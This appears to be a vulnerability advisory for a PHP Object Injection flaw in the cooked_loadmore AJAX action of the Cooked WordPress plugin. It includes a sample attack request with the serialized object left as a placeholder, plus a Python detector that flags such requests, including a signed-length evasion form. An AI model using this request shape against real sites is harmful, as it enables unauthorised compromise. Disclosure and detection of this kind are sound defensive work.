The plugin does not properly validate or sanitize the recipe_args parameter before unserializing it in the cooked_loadmore action, allowing an unauthenticated attacker to trigger a PHP Object Injection vulnerability.
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 769
Connection: close

action=cooked_loadmore&atts%5Bcategory%5D=false&atts%5Border%5D=false&atts%5Borderby%5D=false&atts%5Bshow%5D=false&atts%5Bsearch%5D=true&atts%5Bpagination%5D=true&atts%5Bcolumns%5D=3&atts%5Blayout%5D=modern&atts%5Bauthor%5D=&atts%5Bcompact%5D=false&atts%5Bhide_browse%5D=false&atts%5Bhide_sorting%5D=false&atts%5Bexclude%5D=false&atts%5Binline_browse%5D=false&atts%5Bcuisine%5D=false&atts%5Bcooking-method%5D=false&atts%5Btag%5D=false&recipe_args=<SERIALIZED_PHP_OBJECT>&page=1&is_own_profile=
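A detection-side check for the request shape above, added here as an example and not taken from the plugin or the advisory: it flags form-encoded admin-ajax.php bodies where action is cooked_loadmore and recipe_args carries a serialized PHP object. The function name and the sample bodies are constructed for illustration, and it assumes POST bodies are available to the log pipeline or WAF.

```python
import re
from urllib.parse import parse_qs, urlencode

# A serialized PHP object begins with O:<len>:"Class" (C: for classes that
# implement Serializable), at the start of the value or nested after ';' or
# '{'. The optional '+' covers a signed length such as O:+8:, a form that
# older PHP releases accepted and that naive filters miss.
OBJECT_TOKEN = re.compile(r'(?:^|[;{])[OC]:\+?\d+:"')


def flag_cooked_loadmore(body: str) -> bool:
    """Return True if the body calls cooked_loadmore with an object token
    anywhere inside recipe_args (parse_qs percent-decodes the value once)."""
    fields = parse_qs(body, keep_blank_values=True)
    if "cooked_loadmore" not in fields.get("action", []):
        return False
    return any(OBJECT_TOKEN.search(v) for v in fields.get("recipe_args", []))


def make_body(action: str, recipe_args: str) -> str:
    """Build a constructed request body for the samples below."""
    return urlencode({"action": action, "recipe_args": recipe_args, "page": "1"})


# Constructed samples: a plain serialized array, then harmless stdClass
# objects at top level, nested in an array, and with a signed length.
BENIGN = make_body("cooked_loadmore", 'a:1:{s:14:"posts_per_page";i:9;}')
TOP_LEVEL = make_body("cooked_loadmore", 'O:8:"stdClass":0:{}')
NESTED = make_body("cooked_loadmore", 'a:1:{i:0;O:8:"stdClass":0:{}}')
SIGNED = make_body("cooked_loadmore", 'O:+8:"stdClass":0:{}')
OTHER_ACTION = make_body("heartbeat", 'O:8:"stdClass":0:{}')

if __name__ == "__main__":
    samples = {"benign": BENIGN, "top_level": TOP_LEVEL, "nested": NESTED,
               "signed": SIGNED, "other_action": OTHER_ACTION}
    for name, body in samples.items():
        print(f"{name:13} flagged={flag_cooked_loadmore(body)}")
```

A match is a reason to investigate rather than proof of exploitation, since a string value inside a legitimate array could contain the same byte pattern.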
Marcin Motwicki
Yes
2022-11-21 (about 10 months ago)
2023-06-12 (about 3 months ago)